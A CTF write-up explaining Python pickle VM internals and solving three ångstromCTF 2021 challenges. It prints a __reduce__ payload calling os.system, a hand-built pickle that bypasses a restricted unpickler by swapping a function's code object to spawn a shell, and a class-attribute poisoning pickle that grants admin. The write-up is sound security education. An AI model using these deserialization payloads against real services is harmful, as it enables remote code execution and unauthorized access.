ångstromCTF 2021 - Jar/Snake/Ekans

by Darin Mao on 4/15/2021

Jar, Snake, and Ekans were challenges about python pickles from ångstromCTF 2021. Jar was a pretty typical pickle challenge, but the latter two were not.

Pickle Internals

The pickle module is a pretty special bit of code that allows you to serialize and deserialize many different python classes. However, what is not immediately obvious is how this is accomplished. Rather than storing data directly, pickles store a series of instructions that tell the pickle VM how to recreate that data. When a pickle is loaded, it is not just deserialized; rather, it is executed by the pickle VM. This makes pickles a lot more powerful than something like JSON or YAML.

If you want to see what instructions a pickle contains, you can use pickletools.dis. For example:

    >>> import pickle, pickletools
    >>> pickletools.dis(pickle.dumps([1, 2, 3, 4]))
        0: \x80 PROTO      4
        2: \x95 FRAME      13
       11: ]    EMPTY_LIST
       12: \x94 MEMOIZE    (as 0)
       13: (    MARK
       14: K        BININT1    1
       16: K        BININT1    2
       18: K        BININT1    3
       20: K        BININT1    4
       22: e        APPENDS    (MARK at 13)
       23: .    STOP

For more details on how pickle works, the source code for pickle and pickletools is extremely helpful. Personally, I find pickle more useful because reading the source shows exactly what goes on when an opcode is executed, but pickletools has pretty in-depth documentation about each opcode. Since we’re mostly interested in what goes on during a pickle load, I recommend searching through pickle for load_opcode, where opcode is the opcode you’re interested in.

Note that, by default, the pickle module actually calls a C implementation (the source lives in CPython's Modules/_pickle.c, if you want to read it). However, for all intents and purposes, we can consider the python and C implementations functionally equivalent.
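As a quick sanity check on that claim, here is a small sketch that loads the same pickle with both implementations. It assumes CPython, where the pure-python loader is reachable under the private name pickle._loads; since that name is private, treat it as an implementation detail rather than a documented API.

```python
import pickle

obj = {"a": [1, 2, 3], "b": ("x", None)}
data = pickle.dumps(obj)

fast = pickle.loads(data)    # C accelerator, when it is available
slow = pickle._loads(data)   # pure-python implementation (private name, CPython)

print(fast == slow == obj)
```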


Pickle is a stack-based VM, meaning that most of the data manipulation is done on a stack. However, there is also a second storage area called the memo, which is just a big dictionary with integer keys intended for saving values for use later. This is particularly helpful when deserializing many similar big objects, but we will not be using it very much.
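To make the memo a little more concrete, here is a hand-assembled sketch using the BINPUT and BINGET opcodes (one-byte memo index each). It stores an empty list in memo slot 0, fetches it twice, and packs the three stack items into a tuple; the point is that all three entries are the very same object.

```python
import pickle

p = (
    pickle.EMPTY_LIST            # stack: [[]]
    + pickle.BINPUT + b"\x00"    # memo[0] = top of stack (nothing is popped)
    + pickle.BINGET + b"\x00"    # push memo[0] again
    + pickle.BINGET + b"\x00"    # and once more
    + pickle.TUPLE3              # pop three items, push one 3-tuple
    + pickle.STOP
)

result = pickle.loads(p)
print(result, result[0] is result[1] is result[2])
```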

Most opcodes will push something to the top of the stack. For example, UNICODE reads a newline-terminated string from the pickle and pushes it, and INT reads a newline-terminated decimal string, parses it as an integer, and pushes the result. There is also a special opcode, PROTO, which sets the protocol version of a pickle. Different protocols support different features, but they are generally backwards compatible, so it might be sensible to set the protocol to 4 or 5 at the beginning of your pickles.
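These opcodes are easy to try by hand, since the pickle module exports every opcode as a bytes constant. A minimal sketch (the values are arbitrary):

```python
import pickle

# UNICODE: newline-terminated string, pushed as a str
text = pickle.loads(pickle.UNICODE + b"hello\n" + pickle.STOP)

# INT: newline-terminated decimal string, pushed as an int
number = pickle.loads(pickle.INT + b"1337\n" + pickle.STOP)

# PROTO takes a single byte argument; here it declares protocol 4
with_proto = pickle.loads(
    pickle.PROTO + b"\x04" + pickle.INT + b"1337\n" + pickle.STOP
)

print(repr(text), number, with_proto)
```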

There are far too many opcodes to go through all of them, so it is best to refer to the pickle source when necessary. That being said, there are a few special ones worth mentioning.


The MARK opcode is special because it allows you to create more complex types like lists and dictionaries. What it does is push a special “markobject” onto the stack, and then later opcodes can pop up to the last markobject. In this way, pickles can create many different things, and also nest them as deep as python will allow!

Side note: while the MARK opcode conceptually pushes a special “markobject,” this is not how it is implemented. It is helpful to think of it this way, but the pickle VM will actually just save the entire stack into another metastack (a stack of stacks), then put all future objects into an entirely new stack. Then, when an opcode pops until the mark, the pickle VM will restore the last saved stack from the metastack and return everything on the new stack.

Here’s an example:

    >>> obj = {'a': 1, 'b': 'string', 'c': [1, 2, (3, 4, 5, 6, 7), {'d': None}]}
    >>> pickletools.dis(pickletools.optimize(pickle.dumps(obj)))
        0: \x80 PROTO      4
        2: \x95 FRAME      48
       11: }    EMPTY_DICT
       12: (    MARK
       13: \x8c     SHORT_BINUNICODE 'a'
       16: K        BININT1    1
       18: \x8c     SHORT_BINUNICODE 'b'
       21: \x8c     SHORT_BINUNICODE 'string'
       29: \x8c     SHORT_BINUNICODE 'c'
       32: ]        EMPTY_LIST
       33: (        MARK
       34: K            BININT1    1
       36: K            BININT1    2
       38: (            MARK
       39: K                BININT1    3
       41: K                BININT1    4
       43: K                BININT1    5
       45: K                BININT1    6
       47: K                BININT1    7
       49: t                TUPLE      (MARK at 38)
       50: }            EMPTY_DICT
       51: \x8c         SHORT_BINUNICODE 'd'
       54: N            NONE
       55: s            SETITEM
       56: e            APPENDS    (MARK at 33)
       57: u        SETITEMS   (MARK at 12)
       58: .    STOP

The use of pickletools.optimize here is irrelevant—all it does is remove all the MEMOIZE operations that pickle puts in by default, but the pickle remains functionally identical. As you can see, MARK allows pickles to nest data arbitrarily deeply!
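Nesting with MARK also works when assembling a pickle by hand. The sketch below builds a list containing a tuple using two marks; the helper k is just a made-up shorthand for a one-byte BININT1.

```python
import pickle

def k(n):
    """Hypothetical helper: BININT1 pushes a one-byte unsigned integer."""
    return pickle.BININT1 + bytes([n])

p = (
    pickle.MARK          # outer mark, closed by LIST
    + k(1) + k(2)
    + pickle.MARK        # inner mark, closed by TUPLE
    + k(3) + k(4) + k(5)
    + pickle.TUPLE       # pops to the inner mark -> (3, 4, 5)
    + pickle.LIST        # pops to the outer mark -> [1, 2, (3, 4, 5)]
    + pickle.STOP
)

nested = pickle.loads(p)
print(nested)
```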


The GLOBAL and STACK_GLOBAL opcodes are how pickles can access the outside world. They take two arguments (GLOBAL reads two newline-terminated strings from the pickle, while STACK_GLOBAL pops the top two items off the stack) and call find_class on them. For example, cMODULE\nNAME\n would call find_class('MODULE', 'NAME'). The default implementation of find_class is below:

    def find_class(self, module, name):
        # Subclasses may override this.
        sys.audit('pickle.find_class', module, name)
        if self.proto < 3 and self.fix_imports:
            if (module, name) in _compat_pickle.NAME_MAPPING:
                module, name = _compat_pickle.NAME_MAPPING[(module, name)]
            elif module in _compat_pickle.IMPORT_MAPPING:
                module = _compat_pickle.IMPORT_MAPPING[module]
        __import__(module, level=0)
        if self.proto >= 4:
            return _getattribute(sys.modules[module], name)[0]
        else:
            return getattr(sys.modules[module], name)

find_class is essentially the only way that pickles can access anything beyond primitives like integers and lists. Everything we can access must come from here, and this is why restricted unpicklers will usually just override this function. If the restricted find_class doesn’t allow access to something, then there is no way for pickles to directly get it either.
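One way to see that both opcodes funnel through find_class is to override it in a subclass that simply records each call before deferring to the default lookup. LoggingUnpickler and load_logged are names made up for this sketch, and math.sqrt is just a harmless target.

```python
import io
import math
import pickle

class LoggingUnpickler(pickle.Unpickler):
    """Records every find_class call, then defers to the default lookup."""

    def __init__(self, file):
        super().__init__(file)
        self.lookups = []

    def find_class(self, module, name):
        self.lookups.append((module, name))
        return super().find_class(module, name)

def load_logged(data):
    unpickler = LoggingUnpickler(io.BytesIO(data))
    return unpickler.load(), unpickler.lookups

# GLOBAL reads its two arguments straight from the pickle stream
via_global = pickle.GLOBAL + b"math\nsqrt\n" + pickle.STOP

# STACK_GLOBAL takes them from the top two stack items instead
via_stack_global = (
    pickle.UNICODE + b"math\n"
    + pickle.UNICODE + b"sqrt\n"
    + pickle.STACK_GLOBAL
    + pickle.STOP
)

obj1, seen1 = load_logged(via_global)
obj2, seen2 = load_logged(via_stack_global)
print(obj1 is math.sqrt, seen1)
print(obj2 is math.sqrt, seen2)
```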


The REDUCE opcode is designed to allow classes to define a custom deserialization. The way the interface works is, classes can define a method called __reduce__ or __reduce_ex__ (they do slightly different things) that pickle will call when serializing them. Then, when the pickle is deserialized, it will call whatever function is specified.

Although the documentation specifies that __reduce__ should return either a string or a tuple with very specific elements, all of it just boils down to a very simple opcode:

    def load_reduce(self):
        stack = self.stack
        args = stack.pop()
        func = stack[-1]
        stack[-1] = func(*args)

All this opcode does is pop a tuple of arguments off the stack, then call the top stack item as a function with those arguments. For our purposes, this is an important primitive—it allows us to call any function we can get access to.
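Here is a harmless sketch of that primitive: the same call, max(3, 7), made once with a hand-written REDUCE and once through __reduce__. The Demo class exists only for illustration.

```python
import pickle

# Hand-written: push the callable, push the argument tuple, then REDUCE
p = (
    pickle.GLOBAL + b"builtins\nmax\n"
    + pickle.MARK
    + pickle.BININT1 + b"\x03"
    + pickle.BININT1 + b"\x07"
    + pickle.TUPLE        # (3, 7)
    + pickle.REDUCE       # replaces the callable with max(3, 7)
    + pickle.STOP
)
called = pickle.loads(p)

class Demo:
    """Illustrative class; pickling it emits GLOBAL + args + REDUCE."""
    def __reduce__(self):
        return max, (3, 7)

via_reduce = pickle.loads(pickle.dumps(Demo()))
print(called, via_reduce)
```

Note that unpickling Demo() does not give back a Demo at all, just whatever the function returned.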


The BUILD opcode is another interesting one.

    def load_build(self):
        stack = self.stack
        state = stack.pop()
        inst = stack[-1]
        setstate = getattr(inst, "__setstate__", None)
        if setstate is not None:
            setstate(state)
            return
        slotstate = None
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if state:
            inst_dict = inst.__dict__
            intern = sys.intern
            for k, v in state.items():
                if type(k) is str:
                    inst_dict[intern(k)] = v
                else:
                    inst_dict[k] = v
        if slotstate:
            for k, v in slotstate.items():
                setattr(inst, k, v)

Take the time to read this one carefully, as it is very important. The BUILD opcode is extremely powerful, as it allows us to modify the __dict__ of, or even call setattr on, anything we can get access to.
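Both branches can be exercised with a toy class. In the sketch below, Target, DemoUnpickler and the module name demo are all made up for illustration; the custom find_class only exists so the example does not depend on which module it runs in. A plain dict state lands in the instance's __dict__, while a (None, dict) state goes through setattr, which works even when the target is the class itself.

```python
import io
import pickle

class Target:
    """Hypothetical class used only for this demonstration."""

class DemoUnpickler(pickle.Unpickler):
    # Resolve the made-up name demo.Target to the class above
    def find_class(self, module, name):
        if (module, name) == ("demo", "Target"):
            return Target
        raise pickle.UnpicklingError("not allowed")

def loads(data):
    return DemoUnpickler(io.BytesIO(data)).load()

# Plain dict state: written into inst.__dict__
instance_pickle = (
    pickle.GLOBAL + b"demo\nTarget\n"
    + pickle.EMPTY_TUPLE + pickle.REDUCE              # Target()
    + pickle.MARK
    + pickle.UNICODE + b"x\n" + pickle.BININT1 + b"\x05"
    + pickle.DICT                                     # {'x': 5}
    + pickle.BUILD
    + pickle.STOP
)
inst = loads(instance_pickle)

# (None, dict) state: each item goes through setattr, here on the class
class_pickle = (
    pickle.GLOBAL + b"demo\nTarget\n"
    + pickle.NONE
    + pickle.MARK
    + pickle.UNICODE + b"y\n" + pickle.BININT1 + b"\x07"
    + pickle.DICT                                     # {'y': 7}
    + pickle.TUPLE2                                   # (None, {'y': 7})
    + pickle.BUILD
    + pickle.STOP
)
cls = loads(class_pickle)

print(inst.__dict__, cls is Target, Target.y)
```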


Finally, the STOP opcode does just that—it tells pickle to stop executing and return whatever is on the top of the stack. Note that pickletools will likely complain if the stack is not empty when STOP is reached, but the pickle module does not care. So, don’t worry too much about popping things off the stack when you’re done.
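A tiny sketch of that difference: the pickle below leaves an extra integer on the stack. pickle.loads happily returns the top item, while pickletools.dis raises a ValueError once it reaches STOP (its output is sent to a throwaway buffer here).

```python
import io
import pickle
import pickletools

# Two pushes, one STOP: the 1 is left behind on the stack
p = pickle.BININT1 + b"\x01" + pickle.BININT1 + b"\x02" + pickle.STOP

top = pickle.loads(p)

try:
    pickletools.dis(p, out=io.StringIO())
    complained = False
except ValueError:
    complained = True

print(top, complained)
```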

Jar (web, 70 points)

My other pickle challenges seem to be giving you all a hard time, so here’s a simpler one to get you warmed up.


Arbitrary Pickle Deserialization

In both endpoints, the server will load any pickle we give it.

    @app.route('/')
    def jar():
        contents = request.cookies.get('contents')
        if contents:
            items = pickle.loads(base64.b64decode(contents))
        else:
            items = []

This is a classic challenge, and you can probably find a solution similar to the one below on the internet.

    import pickle
    import base64
    import os

    class RCE:
        def __reduce__(self):
            return os.system, ('ls -la',)  # or whatever command here

    if __name__ == '__main__':
        pickled = pickle.dumps(RCE())
        # the server decodes with base64.b64decode, so use the standard alphabet
        print(base64.b64encode(pickled).decode())

This gives us RCE, and we can easily get the flag with a reverse shell or similar. However, this solution is lame, and with our new knowledge of pickles, we can do much better. Notice that the flag is stored as a global variable that we have access to. We can try using GLOBAL to grab it.

    >>> p = GLOBAL + b'__main__\nflag\n' + STOP
    >>> pickle.loads(p)
    'actf{FAKE_FLAG}'

This calls find_class('__main__', 'flag') as expected. However, the server expects a list, so we adjust accordingly.

    >>> p = MARK + GLOBAL + b'__main__\nflag\n' + LIST + STOP
    >>> pickle.loads(p)
    ['actf{FAKE_FLAG}']

If we base64 encode this and set it as our cookie, we’ll get the flag.
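For anyone who wants to try the whole round trip locally, here is a self-contained sketch. Everything about the "server" is simulated: fake_app is a made-up stand-in module for the challenge's __main__, and the flag is the same fake one as above.

```python
import base64
import pickle
import sys
import types

# Stand-in for the challenge's __main__ module (hypothetical name and flag)
fake_app = types.ModuleType("fake_app")
fake_app.flag = "actf{FAKE_FLAG}"
sys.modules["fake_app"] = fake_app

# Same shape as the payload above, pointed at the stand-in module
p = pickle.MARK + pickle.GLOBAL + b"fake_app\nflag\n" + pickle.LIST + pickle.STOP
cookie = base64.b64encode(p).decode()

# What the route handler does with the cookie value
items = pickle.loads(base64.b64decode(cookie))
print(cookie, items)
```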



Snake (misc, 240 points)

Snake is such a fun game. Slithering around, eating pickles, slamming into walls… that’s the life.


Restricted Pickle Deserialization

This challenge is much more difficult because it restricts what we can access through find_class.

    class SnakeRestrictedUnpickler(pickle.Unpickler):
        def find_class(self, module, name):
            if module == "__main__" and name.startswith("Snake") and name.count(".") <= 1 and len(name) <= len("SnakeSave.HighScores"):
                return super().find_class(module, name)
            raise pickle.UnpicklingError(f"HACKING DETECTED")

Basically, we are allowed to load anything in the __main__ module that starts with Snake, has at most one period, and is no longer than twenty characters. At first glance, this seems safe, but notice that the SnakeWindow function also matches these criteria. Furthermore, since we are allowed one period, we can access any attribute of SnakeWindow, as long as it is short enough.

Code Objects

In python, functions are actually objects that contain a code object. This code object contains, among other things, the bytecode of that function and all the objects it references. And by sheer coincidence, SnakeWindow.__code__ is just the right length to pass the restricted unpickler.

Unfortunately, we can’t just directly overwrite the bytecode of this code object to get arbitrary bytecode execution—that would be far too easy.

    >>> setattr(SnakeWindow.__code__, 'co_code', b'noodles')
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    AttributeError: readonly attribute

However, if we could somehow make our own code object, then we can assign SnakeWindow.__code__ to it, and then when the program later calls SnakeWindow we will have arbitrary bytecode execution. Unfortunately, there is no easy way to get access to the code object constructor. If we could find a way to call type(SnakeWindow.__code__), then we would get the code object class, allowing us to construct a new code object.

__class__ Attribute

All python objects have a special attribute called __class__ that is a reference to the type of the current instance. For example:

    >>> ().__class__
    <class 'tuple'>
    >>> [].__class__
    <class 'list'>
    >>> (1).__class__
    <class 'int'>

Unfortunately, the restricted unpickler does not allow us to directly access SnakeWindow.__code__.__class__, as that would require two periods. Additionally, SnakeWindow.__class__ is too long.
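The length and period limits are easy to check mechanically. The sketch below re-implements just the condition from find_class as a standalone predicate (allowed is a made-up name) and runs the candidates discussed so far through it.

```python
LIMIT = len("SnakeSave.HighScores")  # 20 characters

def allowed(module, name):
    """Same condition as the restricted find_class, without the lookup."""
    return (
        module == "__main__"
        and name.startswith("Snake")
        and name.count(".") <= 1
        and len(name) <= LIMIT
    )

candidates = [
    "SnakeWindow",
    "SnakeWindow.__code__",            # exactly 20 characters
    "SnakeWindow.__code__.__class__",  # two periods
    "SnakeWindow.__class__",           # 21 characters
]

for name in candidates:
    print(f"{name:32} len={len(name):2} allowed={allowed('__main__', name)}")
```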

But what about SnakeSave? One might think that, since SnakeSave is a class rather than an instance, __class__ is not defined at all. However, in python, classes are also objects themselves, instances of type!

    >>> SnakeSave.__class__
    <class 'type'>

This allows us to call type(SnakeWindow.__code__), just like we wanted!

    >>> SnakeSave.__class__(SnakeWindow.__code__)
    <class 'code'>

Now that we have access to the code object constructor, all we need to do is call it with the right arguments (with REDUCE), then assign it to SnakeWindow.__code__ (with BUILD).
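Outside of pickle, the two ingredients look like this. The sketch uses made-up stand-ins (Dummy, victim, payload) rather than the challenge's names, and it assumes Python 3.8 or newer for code.replace, which is used here only to avoid spelling out the version-specific constructor arguments.

```python
import types

class Dummy:
    """Stand-in for any class we are allowed to load."""

def victim(x):
    return "original"

def payload(x):
    return "hijacked"

# Any class's __class__ is type, so calling it with one argument acts as type(obj)
code_class = Dummy.__class__(victim.__code__)

# Swapping the code object changes what the existing function does when called
victim.__code__ = payload.__code__.replace(co_name="victim")
result = victim(0)

print(code_class, result)
```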

Building the Pickle

Note that SnakeWindow is called with one argument. So, we’ll create a function that takes one argument (the reset is to fix the terminal, since the function is called by ncurses). Then, we’ll print out all the necessary arguments to the code object constructor.

    def lmao(xd):
        __import__('os').system('reset;sh')

    print(lmao.__code__.co_argcount)
    print(lmao.__code__.co_posonlyargcount)
    print(lmao.__code__.co_kwonlyargcount)
    print(lmao.__code__.co_nlocals)
    print(lmao.__code__.co_stacksize)
    print(lmao.__code__.co_flags)
    print(lmao.__code__.co_code)
    print(lmao.__code__.co_consts)
    print(lmao.__code__.co_names)
    print(lmao.__code__.co_varnames)
    print(lmao.__code__.co_filename)
    print(lmao.__code__.co_name)
    print(lmao.__code__.co_firstlineno)
    print(lmao.__code__.co_lnotab)
    print(lmao.__code__.co_freevars)
    print(lmao.__code__.co_cellvars)

Now, we’ll create a pickle to get the code object constructor and call it with these arguments, then assign it to SnakeWindow.__code__.

    p = PROTO + b'\x04' + \
        GLOBAL + b'__main__\nSnakeWindow\n' + \
        NONE + \
        MARK + \
            UNICODE + b'__code__\n' + \
            GLOBAL + b'__main__\nSnakeSave.__class__\n' + \
            GLOBAL + b'__main__\nSnakeWindow.__code__\n' + \
            TUPLE1 + REDUCE + \
            MARK + \
                BININT1 + b'\x01' + \
                BININT1 + b'\x00' + \
                BININT1 + b'\x00' + \
                BININT1 + b'\x01' + \
                BININT1 + b'\x03' + \
                BININT1 + b'\x43' + \
                SHORT_BINBYTES + b'\x12' + b't\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00' + \
                NONE + UNICODE + b'os\n' + UNICODE + b'reset;sh\n' + TUPLE3 + \
                UNICODE + b'__import__\n' + UNICODE + b'system\n' + TUPLE2 + \
                UNICODE + b'xd\n' + TUPLE1 + \
                UNICODE + b'\n' + \
                UNICODE + b'lmao\n' + \
                BININT1 + b'\x03' + \
                SHORT_BINBYTES + b'\x02' + b'\x00\x01' + \
                EMPTY_TUPLE + \
                EMPTY_TUPLE + \
            TUPLE + \
            REDUCE + \
            DICT + \
        TUPLE2 + \
        BUILD + \
        STOP

We’re writing the pickle by hand because it builds character and gives us much greater control than simply using pickle.dump. Starting from the inside out, this pickle constructs a code object with the necessary arguments, creates a dictionary {'__code__': code_obj}, creates a tuple (None, code_dict), and finally uses BUILD on SnakeWindow to eventually call setattr(SnakeWindow, '__code__', code_obj). If you don’t understand this fully, I highly recommend following pickletools.dis and stepping through it one instruction at a time.
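The final BUILD step can be tried in isolation with a much smaller pickle. This sketch is not the exploit itself: the code object is handed over by a made-up find_class (DemoUnpickler and the demo module name are hypothetical) instead of being constructed with REDUCE, which keeps it independent of the python version. Only the (None, {'__code__': ...}) state and the resulting setattr are the same.

```python
import io
import pickle

def victim(x):
    return "original"

def payload(x):
    return "hijacked"

class DemoUnpickler(pickle.Unpickler):
    # Hypothetical lookup table standing in for the challenge's find_class
    table = {
        ("demo", "victim"): victim,
        ("demo", "payload_code"): payload.__code__,
    }

    def find_class(self, module, name):
        try:
            return self.table[(module, name)]
        except KeyError:
            raise pickle.UnpicklingError("not allowed") from None

p = (
    pickle.GLOBAL + b"demo\nvictim\n"             # inst for BUILD
    + pickle.NONE                                 # state = None
    + pickle.MARK
    + pickle.UNICODE + b"__code__\n"
    + pickle.GLOBAL + b"demo\npayload_code\n"
    + pickle.DICT                                 # slotstate = {'__code__': code}
    + pickle.TUPLE2                               # (None, slotstate)
    + pickle.BUILD                                # setattr(victim, '__code__', code)
    + pickle.STOP
)

returned = DemoUnpickler(io.BytesIO(p)).load()
outcome = victim(0)
print(returned is victim, outcome)
```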

Sure enough, unpickling this and then calling SnakeWindow results in a shell. However, since the result of our pickle is not a SnakeSave like the game expects, trying to access highScores will fail. This is not a problem, though, because overwriting the code object of SnakeWindow is already done at this point, so we can just remove the STOP and append a regular SnakeSave pickle at the end! Rather than try to generate this ourselves, we can just play a game.

    import base64

    # p is the pickle from above with its trailing STOP removed
    save = base64.b64decode('gASVdwAAAAAAAACMCF9fbWFpbl9flIwJU25ha2VTYXZllJOUKYGUfZQojApoaWdoU2NvcmVzlGgAjBRTbmFrZVNhdmUuSGlnaFNjb3Jlc5STlCmBlH2UKIwGcGxheWVylIwDa2ZilIwGc2NvcmVzlF2USwJhdWKMBGdhbWWUTnViLg==')
    print(base64.b64encode(p + save).decode())
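The trick of dropping STOP and gluing a complete pickle onto the end works because the VM just keeps executing opcodes, and only the final STOP decides what is returned. A minimal sketch with arbitrary values:

```python
import pickle

prefix = pickle.BININT1 + b"\x2a"       # pushes 42 and has no STOP of its own
regular = pickle.dumps({"score": 2})    # a complete, ordinary pickle

# The leftover 42 stays buried on the stack; STOP returns the dict on top
combined = pickle.loads(prefix + regular)
print(combined)
```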

Inputting this save code results in a shell.



Ekans (web, 250 points)

I built myself a pokédex to keep track of all the cool pokémon I catch. There’s this secret pokémon I don’t want anyone to know about, so I used a SafeUnpickler and now nobody can see it! Try it for yourself:


Restricted Pickle Deserialization

The restrictions in this challenge are much more strict than the last one.

    class SafeUnpickler(pickle.Unpickler):
        def find_class(self, module, name):
            if module == "db" and name == "User":
                return User
            raise pickle.UnpicklingError(f"HACKING DETECTED")

Basically, we can only access db.User and nothing else. In addition, the web server is quite peculiar:

    @app.route('/', methods=['GET', 'POST'])
    def pokedex():
        db = importlib.util.find_spec('db').loader.load_module('db')
        if request.method == "POST":
            # make a new user and return
        if 'user' not in request.cookies:
            # send login page and return
        if db.load_user(request).is_admin():
            # send admin panel (no flag) and return
        if not db.load_user(request).authenticated():
            # send invalid credentials page
        # send pokedex page, hiding the flag if not db.load_user(request).is_admin()

We need to send a pickle such that is_admin returns False the first time but True the next time. While this may seem impossible, note that the route handler loads a fresh instance of db on every request, so we can potentially overwrite class attributes on db.User which could lead to some interesting behavior. If this were not the case, then competitors would interfere with each other, so we could rule out the possibility.

A Closer Look at BUILD

Look, again, at the beginning of the source code for load_build:

    def load_build(self):
        stack = self.stack
        state = stack.pop()
        inst = stack[-1]
        setstate = getattr(inst, "__setstate__", None)
        if setstate is not None:
            setstate(state)
            return

Notice that if inst has a __setstate__ attribute, the build opcode will call that function instead. Most importantly, in this case, the build opcode will not continue to write to __dict__ or call setattr. This could lead to different behavior the next time it is invoked.

With this, we can form a plan. Our pickle should have the necessary attributes to make is_admin return True, use BUILD to set the necessary attributes to make is_admin return False, and finally use BUILD to set __setstate__ on the db.User class to any callable. On the next deserialization, the BUILD to make is_admin return False will do nothing, and our deserialized user will be an admin, allowing us to get the flag.

Building the Pickle

Once again, we will write our pickle manually. We have to be somewhat clever about how we execute our plan, because once __setstate__ is set, then BUILD will never work again. The solution is to set admin to True on the db.User class rather than an instance, so that all users are admins by default. Then, we can construct new users by using REDUCE on the constructor instead of using BUILD.

    p = PROTO + b'\x04' + \
        GLOBAL + b'db\nUser\n' + \
        NONE + \
        MARK + \
            UNICODE + b'admin\n' + \
            NEWTRUE + \
            DICT + \
        TUPLE2 + BUILD + \
        EMPTY_TUPLE + REDUCE + \
        MARK + \
            UNICODE + b'admin\n' + \
            NEWFALSE + \
            DICT + \
        BUILD + \
        GLOBAL + b'db\nUser\n' + \
        NONE + \
        MARK + \
            UNICODE + b'__setstate__\n' + \
            GLOBAL + b'db\nUser\n' + \
            DICT + \
        TUPLE2 + BUILD + \
        POP + \
        STOP

This pickle first uses BUILD to set admin to True on the db.User class, then uses REDUCE to construct a new user object. Then, it uses BUILD again to set admin to False on the newly constructed user object. Lastly, it uses BUILD one last time to set __setstate__ to db.User on the db.User class. As with the last challenge, if you don’t understand this fully, I highly recommend following pickletools.dis and stepping through it one instruction at a time.
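The flip from False to True can be reproduced locally. The real db.User is not shown in this writeup, so the User class below is a guess made up for the sketch; the one thing it must do is accept being called with zero or one argument, because once __setstate__ points at the class, every BUILD calls User(state). The unpickler is the same as the challenge's, and the pickle is the one above, split into named pieces.

```python
import io
import pickle

class User:
    """Hypothetical stand-in for db.User."""
    admin = False

    def __init__(self, username="guest"):
        self.username = username

    def is_admin(self):
        return self.admin

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "db" and name == "User":
            return User
        raise pickle.UnpicklingError("HACKING DETECTED")

def load_user(data):
    return SafeUnpickler(io.BytesIO(data)).load()

USER = pickle.GLOBAL + b"db\nUser\n"

def state(key, value_opcodes):
    """Builds the one-item dict {key: value} on the stack."""
    return pickle.MARK + pickle.UNICODE + key + b"\n" + value_opcodes + pickle.DICT

p = (
    pickle.PROTO + b"\x04"
    # setattr(User, 'admin', True) on the class
    + USER + pickle.NONE + state(b"admin", pickle.NEWTRUE) + pickle.TUPLE2 + pickle.BUILD
    # User()
    + pickle.EMPTY_TUPLE + pickle.REDUCE
    # instance.__dict__['admin'] = False (skipped once __setstate__ exists)
    + state(b"admin", pickle.NEWFALSE) + pickle.BUILD
    # setattr(User, '__setstate__', User)
    + USER + pickle.NONE + state(b"__setstate__", USER) + pickle.TUPLE2 + pickle.BUILD
    + pickle.POP
    + pickle.STOP
)

first = load_user(p).is_admin()
second = load_user(p).is_admin()
print(first, second)
```

In the challenge, the class state survives between the two load_user calls because both happen inside the same request; the next request reloads db and starts clean.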

Encoding this pickle with base64 and setting it as our cookie gives the Pokédex page containing the flag.



Final Thoughts

Snake and Ekans were certainly very interesting challenges. I learned a lot about pickles, and also got a couple ideas for some potential future challenges 👀 Am I going to need to understand pickle internals for any real project? No, probably not. But that’s part of the fun, isn’t it?

Huge thanks to kmh for the great challenges 🙂